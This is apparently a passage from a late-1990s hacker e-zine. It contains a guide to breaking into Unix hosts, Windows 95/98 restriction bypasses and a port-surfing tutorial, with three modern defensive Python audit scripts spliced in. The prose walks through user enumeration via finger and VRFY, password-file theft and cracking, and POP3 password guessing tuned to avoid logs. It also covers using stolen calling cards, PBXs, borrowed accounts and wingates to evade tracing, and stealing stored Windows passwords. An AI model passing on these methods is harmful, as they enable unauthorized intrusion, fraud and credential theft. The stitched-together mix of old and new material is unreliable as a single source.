Now if I did not find it on the internet I would turn to the old-fashioned way of finding computers among other things, exchange scanning. This is usually done with the aid of a program called a wardialer. This is simply the process of dialing every number in an exchange in hopes of finding a carrier. I was shocked at the cool things you can find while doing this. I am currently thinking of writing a separate article on this since it's a very broad subject. The fact of the matter is scanning is illegal in some areas and can get you in hot water with your local phone company, which I have had some close calls with. The message here is be careful. Look up some info on this before trying it.

As for other methods for finding computers, there are programs like wardialers which scan a large range of IPs for servers. I have never used one of these before and quite frankly have no desire to either. I will say though that a friend of mine found some interesting things by doing this. Now one very good way to find good things is to look at where e-mails come from through the full headers. If somebody mailbombed you or forged e-mail to you, look on the bright side: they pretty much showed you an anonymous e-mail server. The final way, and by far my favorite, is to look up a city or area code and explore its computers and phone numbers. Pick your home town if you like, although I do not recommend it.
My favorite spots are the towns of former residences which I resided at and also vacation spots of the past or future. Being creative is what will help you. That's what hacking is all about.

Making the Connection

Now this is probably review for most everyone, but for the few who have posted asking this, here it is. Let's say we wanted to hack target.edu, a university in Fakeville, USA. Now let's suppose we already had an account on the system, a UNIX shell account. To connect we want to telnet into port 23, the telnet port. This would be where we'd be presented with a login screen. Now if you want to hack an account, that's the place to begin. Now the first way, and by far the best, is to telnet out of a UNIX shell account by giving this command:

    Telnet target.edu 23

This command given at the command prompt would give you the login screen. Now let's suppose you can't get a UNIX shell account, nor do you have any kind of UNIX on your computer. In case you're running Windows we will use the telnet client shipped with Windows. We get to our telnet client by simply going to Start --> Run --> telnet. From there we would go to Connect --> Remote System. Now for host we put in target.edu and for port, 23. For term type I use Vt100, but it's personal preference I suppose. Now if we wanted to telnet to another daemon besides the default telnet port we would type in the port that daemon runs on. Here's a freebie: port 25 is Send Mail Transfer Protocol (for info on it download my article "The Wonderful and Evil World Of E-mail" available on my website). I strongly suggest you get yourself a UNIX port list, available on most hacking sites on the web.

Analyzing

This is where the bulk of the work comes in, finding out everything you can find without actually entering a username and password. Now remember, while gathering info you don't want to make the system administrator too nervous or he may pick up the good old telephone and have a little chat with your ISP.
ISPs are quick to throw your ass off, especially if it's a big service. Now the first thing to do is find out what ports a computer has open; for those who don't know, ports are where various services run. Now there are two ways to do this: you can do a port scan or you can port surf by hand. Now if you want to keep things quiet your best bet is to do it by hand. If you try to automate it then you're asking for trouble, because all those connects will show up in the logs. Now if you don't give a rat's ass about the system operator knowing, then start up the port scanner and go take a walk. When you come back you will be looking at a list of ports. Now when you're looking for ports a handy dandy port list will come in good use. That should be numero uno on your equipment list. After time you won't even need it. That time is not now though; you are still inexperienced, so I suggest printing it off and keeping it in a spot you won't lose it.

Now there are many services which will give you info, but my favorite is port 79, finger. With this little service you can gain a wealth of information such as usernames, info on users (perfect for social engineering), and times when last logins occurred. So what you should do is take a look if port 79 is open. It has become rarer, but by no means is it extinct. I still find it often. Now keep in mind you will not see what you're typing and you will only get one shot before it disconnects you. Some of the first things you can try with finger are common names. Try john, mary, paul, joe, jane, and so on. This can sometimes produce quite a few valid usernames. Along with that, depending on the version of finger and how trusting they are, you can get other info. Full names, addresses, phone numbers, e-mail addresses and things along that line are out there for the taking. Now you can also try some other things with finger, such as fingering root, the superuser account of UNIX systems.
This will tell you if he is currently on or when was the last time he logged in. It may also give you some other interesting details. Try fingering accounts like bin, system, manager, @, 0, @target.com, and anything else you can think of. Now I suggest you turn on logging so that you can review all this info at another time and figure out what will be useful. Also, another little thing that can help you figure out valid usernames without filling up those login logs is the SMTP daemon on port 25, most likely Sendmail. Using the command "vrfy" you can check to see if a certain user exists on the system. Some things to try are common names, guest, and anonymous. Make friends with SMTP, it will be quite helpful in some cases of getting into systems.

What you may also want to do is check to see if they allow for anonymous ftp. If it is, log in as you would on any anonymous ftp server (if you are not familiar with ftp go to a search engine and look up "Ftp Help"). Now if you get in I suggest nosing around the /etc directory. This holds the password file in a UNIX system. Download all the files from there and take a look at them. The one you really want to look at is passwd. Now I know you may have read old texts and think you will just download it and run a password cracker on it and then have superuser access. Fat chance. Most password files are shadowed, meaning in the place of where the password should be you have some garbage character there (*, $, !, etc). If by some freak chance you do get one that isn't shadowed, get hold of a UNIX password cracker and dictionary file. Then use those to crack the password file. This is doubtful though, but it doesn't hurt to try. While in FTP check out everything you have access to. Sometimes you'll find some info that could be useful, not to mention I have heard some morons upload stuff they would attach to an e-mail to anonymous ftp since it is quicker. I never came across that, but I bet it'd be nice to.
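The defender's check for the password-file point above, added here as an example and not part of the article: it audits the text of a passwd file for entries whose second field still carries a hash (the "unshadowed" case), for empty password fields, and for extra UID 0 logins. The sample file, the hash-shaped string in it and the function names are constructed for this example.

```python
"""Audit a Unix passwd file for entries that are not shadowed.

Added example for this section, not code from the original article.
Constructed sample input; on a real system you would call
audit_passwd(open("/etc/passwd").read()) (hypothetical, read-only use).
"""
from __future__ import annotations
from dataclasses import dataclass

# Second-field values that mean "hash lives in /etc/shadow" or "account
# locked". Anything else in that field is world-readable hash material.
PLACEHOLDERS = {"x", "*", "!", "!!", "*LK*", "NP"}


@dataclass
class Finding:
    user: str
    uid: int          # -1 when the line could not be parsed
    issue: str        # "unshadowed", "empty", "extra uid 0" or "malformed"


def audit_passwd(text: str) -> list[Finding]:
    """Walk passwd-format text and return one Finding per problem entry."""
    findings: list[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(fields[0], -1, "malformed"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        try:
            uid_n = int(uid)
        except ValueError:
            findings.append(Finding(user, -1, "malformed"))
            continue
        if pw == "":
            # no password at all: anyone can log in as this user
            findings.append(Finding(user, uid_n, "empty"))
        elif pw not in PLACEHOLDERS and pw.lstrip("!*"):
            # a real hash, even a locked one such as "!$1$...", is exposed
            findings.append(Finding(user, uid_n, "unshadowed"))
        if uid_n == 0 and user != "root":
            # a second UID 0 login is a classic leftover worth reviewing
            findings.append(Finding(user, uid_n, "extra uid 0"))
    return findings


# Constructed sample: the 13-character string on john's line is shaped
# like a DES crypt(3) hash but is made up for this example.
SAMPLE_PASSWD = """\
# constructed sample, not a real system
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/sbin/nologin
ftp:!!:14:50:FTP User:/var/ftp:/sbin/nologin
john:ab3gQ7dOKXMp2:1001:100:John Smith:/home/john:/bin/sh
guest::1002:100:Guest:/home/guest:/bin/sh
toor:x:0:0:alternate root:/root:/bin/sh
"""

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"{f.issue:12} {f.user} (uid {f.uid})")
```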
And the last thing to do before you log off is see if you have write access. Try to upload something to anonymous ftp, and if it works then note that, because it may be possible to do some interesting exploits with it. More likely you will get an access denied message.

Exploitation

Ok, you gathered all the info you could on this server. You analyzed it over and over. You know every port that is open and you know what service it is running. You know each piece of software and version they are running. Once you have all this info you have many ways this can go. Usually you're gonna see your breakins to systems in one of two ways. Number one, and my favorite, user and system administrator stupidity. Number two, and also a very exciting thing, is problems with the software and misconfigurations.

Now let's talk about the first way. Back in the old days this was the main way to get in, the easiest at least. You'd call up some dipshit of a user, say that his system was going to crash if you didn't get in there to correct a bug. Now that the world is shifting towards a more computer literate society people are wising up to these things, but that's not to say there aren't still stupid people out there; if you don't believe me look at the hype about the last major virus, Melissa, which was nothing more than a macro that crashed a few mail servers. People shit their pants over this. This just goes to show you that people get scared when they don't understand something. Now there are some papers out there on social engineering, but let me say right now no article will make you an experienced bullshit artist. That only comes with practice. Now besides getting the users to tell you their password you can attempt to guess their password. Now you already have some info on the person. You should know their gender and name from finger information.
Also if you checked to see if they have a personal web page you may know everything about that person from their favorite cereal to what they hate in society. Take this info and create a list of common passwords this person may choose. Now when you consider your subject, remember that your giggly secretary is going to pick words like love and honey while your horny system operator who hasn't seen light is going to be picking words like blowjob. Now this may sound funny, but every girl I know picks cute little passwords. When you make your list you have to consider your target. Once you have your list together you are going to attempt to brute force the password. Meaning educated guessing. I also suggest if you know they have e-mail on the system you attempt to do your brute forcing through port 110, POP3. POP, post office protocol, doesn't stop you after three tries. This is helpful in reducing the logs a bit. When you do this you also better be using one of the protection methods listed below. No matter what people tell you jail is no fun and Big Dick Bubba is not gonna be gentle with you either.

Now as I said before there is a second method which is a little more advanced and by far more practical. This is finding exploits in the software or services a server is running. The best example is Sendmail, the SMTP daemon. This piece of work has so many holes it's not even funny. I strongly suggest you read up on sendmail exploits because these are very common to find. Throughout the years sendmail has compromised root, password files, and other such security risks. If your target server is running sendmail I suggest you check with either www.rootshell.com or some sort of search engine to see if it's an exploitable version. Other daemons which have fallen prey are IMAP, fingerd (as if giving user info wasn't enough), and POP (not limiting the amount of bad logins sounds safe to you?). Check up on all the software versions and see what you turn up with.
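The defensive side of the POP3 point above, as an added example and not the article's code: since the daemon itself does not cut anyone off after a few bad logins, the failures have to be counted in the logs, per client and within a time window, and the number of distinct accounts tried tells a typo apart from a spray. The log line format, the sample lines and the addresses are constructed for this example; LOG_RE is an assumption to adapt to whatever your POP3 daemon actually writes to syslog.

```python
"""Spot POP3 password guessing in mail-server logs.

Added example, not the article's code. The log line format, the sample
lines and the addresses below are constructed; LOG_RE is an assumption
to adapt to your own daemon's messages.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed syslog line:
#   "<Mon dd HH:MM:SS> <host> popper[<pid>]: Login failed: user=<u> host=<ip>"
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ popper\[\d+\]: "
    r"Login failed: user=(?P<user>\S+) host=(?P<host>[\d.]+)$"
)

# Constructed sample: 192.0.2.5 walks through several accounts in a few
# seconds; 198.51.100.7 is a user mistyping a password twice, hours apart.
SAMPLE_LOG = """\
Apr 12 02:10:01 mail popper[411]: Login failed: user=john host=192.0.2.5
Apr 12 02:10:03 mail popper[412]: Login failed: user=john host=192.0.2.5
Apr 12 02:10:04 mail popper[413]: Login failed: user=mary host=192.0.2.5
Apr 12 02:10:06 mail popper[414]: Login failed: user=paul host=192.0.2.5
Apr 12 02:10:09 mail popper[415]: Login failed: user=john host=192.0.2.5
Apr 12 02:10:11 mail popper[416]: Login failed: user=jane host=192.0.2.5
Apr 12 02:10:40 mail popper[420]: Login failed: user=joe host=198.51.100.7
Apr 12 03:30:00 mail popper[499]: Login failed: user=joe host=198.51.100.7
"""


def parse(log_text, year=1999):
    """Return (timestamp, client_host, username) for each failed login."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # unrelated syslog traffic
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["host"], m["user"]))
    return events


def detect(events, threshold=5, window=timedelta(minutes=5)):
    """Sliding window per client host.

    Returns {host: {"failures": n, "users": [...]}} for every host whose
    densest `window` holds at least `threshold` failures, with the set of
    accounts tried in that window (several users = spraying, not a typo).
    """
    by_host = defaultdict(list)
    for ts, host, user in sorted(events):
        by_host[host].append((ts, user))
    alerts = {}
    for host, evs in by_host.items():
        best, best_users, start = 0, set(), 0
        for end in range(len(evs)):
            # drop events that fell out of the window ending at evs[end]
            while evs[end][0] - evs[start][0] > window:
                start += 1
            n = end - start + 1
            if n >= threshold and n > best:
                best = n
                best_users = {u for _, u in evs[start:end + 1]}
        if best:
            alerts[host] = {"failures": best, "users": sorted(best_users)}
    return alerts


if __name__ == "__main__":
    for host, info in detect(parse(SAMPLE_LOG)).items():
        print(f"{host}: {info['failures']} failures, accounts {info['users']}")
```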
You see, it's all about how much you can learn, how much information you have. When you check out a system always keep your eyes open. Now one of the weird and crazy things you have to do is THINK! There is no complete textbook method to hacking. No secret codes or methods that will always compromise every system. This is an important thing to remember. Now as for exploits, besides checking with rootshell.com I also suggest you subscribe to any security mailings you can find. Keep up to date these days, because new techniques come out every day.

What To Do Once You're In

Ok, you were able to get into a system; either you have a user or administrator account. Now depending on the system both may be very interesting. Once you are in, you hopefully understand how to get around in the system. If you don't then I recommend you find out what the hell you are doing before you mess something up. Commands like help and man will get you around, but further help can always be obtained by searching online. Look around and see what you have access to. Take a look at what directories you have access to and whether you have read or write access. Also check to see what e-mail is lying around. You may even have access to a web directory. Now you have access to many things and you are very powerful at this point. Now something that runs rampant with newbies is a surge of all that power and they become destructive. Dance, sing, and rejoice, but do not screw things up without thinking it through. This is where ethics come in; you have to be responsible or you are no better than the media stereotypes. So as a final word on it, be careful.

IV. Protection

*67

This is one of the simplest and easiest ways to start protecting yourself, yet so many hackers and phreakers don't get it. For instance the guy who spread the Melissa Virus thought he was being slick because he was using a stolen AOL account to do it. Yet the guy didn't even make it difficult for AOL to trace him by dialing in with *67.
Remember, most ISPs will keep records of where the call came from. When you are dialing anything that isn't toll free you should most definitely use it. With the widespread use of Caller ID it's become a real necessity. *67 is free to use, so why not always use it. It only takes three extra seconds at the most out of your life, so be smart and use it. This is not to say that it will be the one thing to save your ass, it won't. It just makes it a little bit tougher. Now if you are calling up a toll free number (800, 888, or 877) don't even bother with *67. They have something called ANI which will automatically give them your number whether you *67 or not. As a precaution though, do yourself a favor and do it.

Calling Cards

Everyone has had experiences with prepaid calling cards and knows how they work. These little babies are quite handy when it comes to hacking and phreaking. One reason is because you can easily steal them or card them and not get caught. The second though is most of the time it won't show your home phone number since you're dialing out of the company who owns the calling card. Using these cards can be an added piece of protection, but please remember the calling card company keeps logs and if requested it is possible to trace it back to the phone you used, so your best bet is to use this with other methods we are talking about today.

PBX's

This is one of the best ways to protect yourself and get free calls at the same time. A PBX, Private Branch Exchange, is a phone network set up in offices so that the company doesn't have to pay for a ton of lines; instead they just have a few lines going in and out and those are on the PBX. You know when you're at school and you have to press nine to get an outside line, well that's a PBX. Now sometimes these PBX's have outside access so their employees don't have to get charged. Usually you will find one of these while scanning and it will identify itself by a long tone or a distant dial tone.
These are for the most part guarded by a code. For some in-depth info on hacking these I suggest you do a search for "PBX hacking". Still use some other protection methods in conjunction with this.

Borrowed Accounts

Alone this method is shit, because they will trace it back to the phone line if you do anything really bad. Though if you do some mild hacking and use this with some other methods it can be quite good. You don't have to worry whether you will get kicked off your ISP since it's not really yours anyway. Also it can be used to impersonate other people on IRC if you have reason to. Now if you plan to be doing something, don't do it with your own account, because when they check the logs they will see your name, address, and phone number and that will be it. So as always, be cautious.

Public Terminals

Now you will either love or hate this method. It seems most public places are getting public terminals. Libraries, schools, airports, you name it and they are starting to offer it. These can offer good things such as anonymity, but there are drawbacks. This is the outside world we are talking about. You will have to deal with nosy people; librarians are really a pain in the ass (school librarians are the worst). If you use a public terminal there is a good chance there will be security in place that will prevent you from doing a lot of things, and this goes twice if you are doing stuff at school. So although you have the anonymity, hiding behind the innocent who use the computer to chat in Yahoo! or AOL, just try not to draw too much attention to yourself while doing this either, or people will be on your back about doing anything.

Wingates

These are one of the best methods of protection while hacking on the internet. These are abundant and easy to find by either scanning or looking at the bans on Undernet for exploitable wingates. These are used by telnetting in and getting a prompt like, Wingate>.
From this you can type in a server and port number like this: target.com 23. That will telnet you to target.com, and if you want added protection telnet to another wingate and telnet from that. You can string together several wingates and hack all you like without getting caught. This is timely, but it's worth it to keep your ass out of jail.

Outdials

These are a thing of the past, but supposedly there are still some around. I will say the alt.2600 FAQ's outdial list doesn't work, so don't waste your time. Outdials are used to dial out of UNIX systems, meaning you can dial anonymously and free to one of the few BBSs still around or to a computer dialup on the other side of the country. If you hack a shell and it has a program called Kermit you are in luck, because you will be able to do this. If you really want to hunt down an outdial get a text on it. Remember, on the internet you have information as fast as you can type, so just look it up.

V. Conclusion

Behaviour

If you have read through this and you are new you probably have gained quite a lot of information, and hopefully I have piqued your interest a bit. No one is going to go out and hack for you, so if you really are dedicated then get out there and do it. As you get out into the cyberworld be aware though, no one likes an asshole, so act with integrity and smarts. Try to be nice even to those ignorant bastards asking for punters. Try to explain to them that's not hacking and what hacking is. If you can't though, just tell them to get lost. Just try to maintain some of those manners mommy and daddy taught you and things will be fine.

Closing

I bid you good luck in your hacking career, may it be long and bust free. Use your head in all situations and listen to the advice I have given you. As a last piece of advice check out phreaking, phone hacking. The skills you learn come in handy for hacking. Last but not least have fun and learn something, that's what this is all about. If you didn't like this article I could care less.
Get all my texts and other information you are looking for at my website http://mobboss.dragx.cx

By The Mob Boss
Co-edited by TheGuy

This has been a publication written by THE MOB BOSS; he is in no way responsible for the accuracy or results from the use of info in this article. Anything done is totally done at the user's discretion. THE MOB BOSS in no way or form supports, aids, or participates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS are strictly for informational purposes only. THE MOB BOSS copyright 1999 all rights reserved.

:..::..End Of File..::..:

:..::..File 5 Of 14.::..:
:.Windows Security Holes:
:..::..By NeonBunny.::..:

<*> Windoze 95/98 Security Holes
+----------------------------+

Most schools and businesses are using Windows 95/98, yet most texts concentrate on obscure operating systems, so here is an insight on how to hack the O/S from hell! Some of this stuff is aimed at newbies, so don't flame me; you never know, you might just learn something!

The major way to gain access to areas you're not supposed to be in (passwords still apply) is to use the "common dialogue box open/save dialogue", or in English, the box where you save or open your work in nearly all programs. This dialogue box includes a box for you to enter the document path; by entering the name/address of what you want to access, the files section will normally display what you want, bypassing Windoze security. An example of this is to get to network computers: typing "\\server" will give you a list of the shared folders on the computer called "server". By using this method you can use the top pull down box to work your way up the network tree to a full list of machines. Another use can be to gain access to drives from which you have normally been banned; since it is hard to set up read and write access to local drives with Windoze, this can prove invaluable.
By typing "c:\*.*" you can gain access to the local drive even if the sysadmins don't want you to. Similar tricks can be achieved with Netscape Navigator and Internet Explorer.

Microsoft Word is a great hacking tool and yet it's badly set up on school networks all over the world. The major problem with Word is that it's too powerful and includes its own programming language. By using this you can run any program on the network such as Explorer, Registry Editors etc. To use this with Word 95 simply go to the "Tools" menu and choose "Macro"; from here just type a new name and press enter. This will throw you into Word Basic; now all you need to do is type the following between the "Sub MAIN" and "End Sub" lines:

    shell "c:\windows\explorer"

Clicking on the play button will start up Windoze Explorer for all your hacking needs. The real fun with good old macros is that they occasionally bypass the Windoze security settings, allowing you to run Policy Editor even if you are not allowed to run it normally. So you can then modify your settings to give you access to Registry editing programs and then shell Regedit the same way.

By deleting the appwiz.cpl files it's possible to stop the Create Shortcut wizard. If this happens then the .lnk file is still created; simply right-click it and choose Properties to modify the shortcut to point to your favourite executable/drive. If this doesn't work then create a new file (in any way you see fit), rename the file from .??? to .lnk and then choose Properties.

Hitting Control + Esc at a normal login screen on Win 95 will bring up Task Manager; from here you can run Explorer to bring you a desktop, or any other executable fun. This can be (and on RM networks is) prevented by adding taskman.exe= to the [boot] section in system.ini.
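As an added example (my own code, not part of NeonBunny's article), here is a small Python audit of the two configuration lines the article gives as the fixes for these tricks: the taskman.exe= line in the [boot] section of system.ini, and, jumping ahead to the c:\msdos.sys setting covered further down, BootKeys=0. The file contents are constructed samples, and the shell= check is an addition of mine, not something the article describes.

```python
# Added example: audit the Win9x config lines NeonBunny's article names as
# the fixes for the Ctrl+Esc and F8 tricks. All file contents below are
# constructed samples, not copies of any real machine.

def parse_ini(text):
    """Case-insensitive INI parser tolerant of Win9x quirks: keys before
    any section header, ';' comments and the ';xxxx' padding in msdos.sys."""
    sections = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if not sep:
            continue  # not a key=value line; ignore it
        sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_system_ini(text):
    """Findings for the [boot] section. taskman.exe= with an empty value is
    the article's fix for Ctrl+Esc at the logon screen; the shell= check is
    an extra sanity check (assumption: explorer.exe is the expected shell)."""
    boot = parse_ini(text).get("boot", {})
    findings = []
    shell = boot.get("shell", "")
    if shell.lower() != "explorer.exe":
        findings.append("system.ini [boot]: shell=%r is not explorer.exe" % shell)
    if "taskman.exe" not in boot:
        findings.append("system.ini [boot]: no taskman.exe= line, so Ctrl+Esc "
                        "at the logon screen opens Task Manager")
    elif boot["taskman.exe"]:
        findings.append("system.ini [boot]: taskman.exe=%r overrides Task Manager"
                        % boot["taskman.exe"])
    return findings


def audit_msdos_sys(text):
    """BootKeys=0 in [Options] disables the F8 'Starting Windows' menu;
    an absent key means the default (menu enabled)."""
    opts = parse_ini(text).get("options", {})
    findings = []
    if opts.get("bootkeys", "1") != "0":
        findings.append("msdos.sys [Options]: BootKeys is not 0, so F8 at "
                        "'Starting Windows' offers Safe Mode and Command Prompt")
    return findings


# Constructed samples: a hardened pair and a default-looking pair.
HARDENED_SYSTEM_INI = """[boot]
shell=Explorer.exe
taskman.exe=
[386Enh]
device=*vcd
"""

DEFAULT_SYSTEM_INI = """[boot]
shell=Explorer.exe
[386Enh]
device=*vcd
"""

HARDENED_MSDOS_SYS = r"""[Paths]
WinDir=C:\WINDOWS
[Options]
BootMulti=1
BootGUI=1
BootKeys=0
;xxxxxxxxxxxxxxxxxxxxxxxx
"""

DEFAULT_MSDOS_SYS = r"""[Paths]
WinDir=C:\WINDOWS
[Options]
BootGUI=1
;xxxxxxxxxxxxxxxxxxxxxxxx
"""

if __name__ == "__main__":
    hardened = audit_system_ini(HARDENED_SYSTEM_INI) + audit_msdos_sys(HARDENED_MSDOS_SYS)
    default = audit_system_ini(DEFAULT_SYSTEM_INI) + audit_msdos_sys(DEFAULT_MSDOS_SYS)
    print("hardened:", hardened or "no findings")
    print("default: ", default or "no findings")
```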
It's often easy to access forbidden programs by right-clicking the desktop (and other places) and choosing "New" and then the file associated with your program. It'll only run certain programs but it's a nice way to get to NotePad etc. quickly.

By browsing through a Common Dialog Box (see above) you can select executables and (assuming that QuickView is installed) choose QuickView from the right-click menu; from here choose the icon in the top left of the QuickView window to launch the program.

If Windows 95 has IE4, or Windows 98 (with IE4 built in), it is normally possible to create new toolbars. Right-click the start bar, choose Toolbars and choose New Toolbar. From here you can enter the hidden drive letters and get a full directory listing on the start bar.

It's almost impossible to remove the Help option from the start menu. Open it up and do a search for "Click here", which will bring up a list of help files which provide a button that'll let you launch certain programs.

Hitting F8 when Windows says "Starting Windows 9X" (or simply after the BIOS appears to be finishing off) will bring you a boot menu. From here you can choose Command Prompt and Safe Mode amongst other such goodies. If this doesn't work then modify the file "c:\msdos.sys". Within this file is the setting which disables the "Starting Windows 9X" option menu; modify the "BOOTKEYS=0" line to read "BOOTKEYS=1" to reap the benefits of this hole.

Running the group-converter program (c:\windows\grpconv.exe) brings back the Shutdown command on the start bar. This program can also be used to create start menu items from the included .grp files in the c:\windows\ directory; just run the .grp files or, on some machines, run grpconv for all of them.

Windows stores nearly all passwords within a single file which is normally called "c:\windows\USERNAME.pwl". Although encrypted, all is not lost. The encryption uses the username to encrypt the password.
A common way into the system is to delete the user's password list and then login as the user, where Windows will prompt you for a new password. If you rename this file instead of removing it and then login as the user, the same effect will take place. Once in, you can rename the password list back and now use all of the user's stored passwords. This can prove useful on a Windows 95 network where all folder passwords that are chosen to be stored are kept in the password list. As a result of this, you can rename the admin PWL and then rename it back to gain access to folders which would normally be password protected; you can also remotely administer computers and in fact do anything, assuming that the lazy sysadmin chose to save the password.

Using old Windows programs can get through restrictions set up with Policy Editor; since they don't use the rundll32 APIs (I think that's correct) they don't have hidden drives etc. Try fileman.exe and progman.exe for examples of this.

Windows, like nearly all O/Ses, uses shells. The usual one is explorer.exe which can't be removed, but Microsoft saw fit to use the one exe as the shell and the file explorer, duh! Other shells include Internet browsers; these don't follow the Windows drive restrictions etc. since they can run independently (usually because they're designed to run on more than one platform).

If you're having problems getting into restricted areas of the desktop then try creating folders named XXXX.{NNNN-NNNN} where XXXX is the folder name and NNNN is the numbers; by using the below list this will get you access to some areas of interest. E.g. Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}

{208D2C60-3AEA-1069-A2D7-08002B30309D} - Network Neighborhood
{2227A280-3AEA-1069-A2DE-08002B30309D} - Printers - works
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - My Computer
{21EC2020-3AEA-1069-A2DD-08002B30309D} - Control Panel - works
{3DC7A020-0ACD-11CF-A9BB-00AA004AE837} - Internet - sweet!!
{645FF040-5081-101B-9F08-00AA002F954E} - Recycle Bin - works
{85BBD920-42A0-1069-A2E4-08002B30309D} - Brief Case - works
{871C5380-42A0-1069-A2EA-08002B30309D} - Internet Explorer - a link
{a4d92740-67cd-11cf-96f2-00aa00a11dd9} - DUN - Doesn't work
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Task Scheduler

We've seen how we can bypass drive restrictions through the common dialog box, but similar can be done with Explorer on some early versions of Windows. Take a peek in the Tools menu and see if there's a Go... option; if so, simply type in the drive and away you go. Explorer even seems to unhide the drive for the rest of the session!

Instead of pressing Cancel at the login screen why not try CTRL+ALT+Break, ALT+F4 or CTRL+ALT+Scroll Lock, which also does the same thing.

If the FIND command is needed there's no need to start hacking your way into the admin account, just hit CONTROL + ESC (to bring up the start menu), ESC (to hide it again), F3 (to bring up the Find dialog). Now that was hard wasn't it!

NeonBunny
the_neon_bunny@hotmail.com

:..::..End Of File..::..:

:..::..File 6 Of 14.::..:
:.Portsurfing Computers.:
:..::..By Darkflame.::..:

<*> PortSurfing
*darkflame@zetnet.co.uk*

The Introduction

I have chosen portsurfing as my next topic of discussion because I feel that it is a fairly easy, but possibly rewarding, skill that takes advantage of the individual's perception and imagination. In its basic, un-tooled form it requires no programs that you don't already have on your machine (be it Unix or Windows).

There are some key concepts you have to understand for this text to make any sense to you. Well, as much sense as a text by me can make :). They are things you will probably have heard of before, but some may not, so have a skim, and if you recognise them skip to the next part.

Port (Virtual) - A software port that is used for a specific purpose. A daemon runs on this port, offering services to any user who drops by.
Daemon - A piece of software which manipulates TCP/IP and offers a particular service to the user of the port it's designed to run on.

TCP/IP - Transmission Control Protocol/Internet Protocol. (See my next text for details.)

Main Text

There is an almost infinite number of ports available, but some are more well known than others. For example, when contacting a web page your browser contacts port 80 of the remote computer, and port 21 when looking for an FTP host. You do not need to connect to a specific port when the client already has a preset port:

Netscape Navigator -> Web Page
WS_FTP -> FTP Host

Your telnet client can also connect to these, and any other, ports, even if they are not intended for it. This is not illegal, and provides you with a whole new perspective of the computer you are connected to. These ports can be found using a program like SATAN or SAINT for Unix and Linux. These programs check for open ports and exploitable daemons from there onwards. But as I professed that this would be a text where I didn't expect you to have any other programs than the ones already on your machine, I will show how this can be done manually.

Now you select your target host (www.fubar.com will be used for demonstration purposes). A port extremely well known to crackers is port 79 (the finger port). This port allows you to find out information on users on the system. Early versions of a finger program are extremely easy to crash, and also have a tendency to either run from root, or make calls to root. (I'm assuming you know what root is.) So in theory, if this program just happened to crash while you were sitting there, you may just happen to find yourself lying on root. I'm not saying that you should do this, in fact I'm saying you shouldn't because it's against the law.
To see if your target host www.fubar.com had the finger port enabled you would use the command from your Unix shell or DOS prompt:

telnet www.fubar.com 79

Hopefully you would get the message:

Connected to www.fubar.com

From here, you would try and coax the daemon into telling you how it takes it (input, that is). You would do this by typing:

man - (the man command on UNIX gives you online help for a program)
? - (trying to get the machine to show you what commands it takes)
help - (self explanatory)

One of these should work. If they don't then try other keywords that come to mind, and see what kind of response you get; this is where you are left to your own initiative. You could also telnet to port 15, which shows all the network connections made by your host.

If you think about it, you can probably see how port surfing leads on to hundreds of possible break-ins. Lots of daemons have buggy software, and smaller servers may run these as a money saving option. You can see what port software is exploitable from www.rootshell.com, but you should see if you can find out information on the software running. For instance, if you saw that www.fubar.com was running ushttp v1.0 (fictitious) on their web port, you would go to www.infoseek.com and do a search for 'ushttp://'. From here you could have a look at the software's page, and see how professional it looked, how much it cost etc. All this should give you a clearer picture about the system you are hacking, and knowledge of the system you are hacking is vitally important. You should see how the software is made up, and how it could possibly be manipulated to allow you into the host. Please try to refrain from crashing the port to leave you on root because this is considered cracking, and to me it is too 'script kiddie'-ish to be regarded as hacking. Hopefully with a little bit of thought you can see how you can expand from this information to match the system you are hacking.
Dodgy daemons and interesting ports are very popular ways of gaining access to a machine. Port surfing is a very good way of achieving lots through a simple technique.

List of common or standard ports:

Port number   Service
7             echo
9             discard
11            systat
13            daytime
15            netstat
19            chargen
21            ftp
23            telnet
25            smtp
37            time
39            rlp
43            whois
53            domain
70            gopher
79            finger
80            http
110           pop
119           nntp
443           shttp
512           biff
513           rlogin, who
514           shell, syslog
520           route

There are more but these are the most common ones.

Remember: Get onto your computer, and call upon your telnet program. To connect give the command:

telnet

When you get a response, it's all down to you from there on in.

--
darkflame@fuckyou.co.uk
http://welcome.to/digital.insanity
'The roots of education are bitter, but the fruits are sweet'

:..::..End Of File..::..:

:..::..File 7 Of 14.::..:
:.::..The Virus File.::.:
:..::.:.By HitMan.:.::..:

Viruses:
-=-=-=-=

I for one can start by saying that most of us have come across a virus at some stage in their life. It may have been yours or your mate's but it still means that you know what I am talking about. When I was about seven or eight years old I came across my very first virus, 'RIPPER', and this by no means was a joke. It completely messed up my life by infecting my disks and destroying my programs. It was a pain in the ass. But since the day after that experience I have protected myself and I have intercepted such viruses as 'RAPE' and 'MESSIAH' etc. The list is endless but basically this might clear up some of those so-called newbie questions or is just simply a nice little file for your collection.

By far the most common method of transmission for viruses has been the floppy disk (90% of all virii have been transmitted by a floppy). In order to stop any infection, companies such as McAfee (now called Network Associates) have brought out virus protection, but because of there being 13 new viruses discovered every day all of the protectors lose their effect.
The worst thing about the protectors is that as they are a needed program, they consume memory which in turn will decrease the power of your machine. This is a big piss-up if you consider that they are not even guaranteed to find the fucker. With that in mind many people disable the protector/scanner which leaves them wide open as prey for 'abusive crackers'.

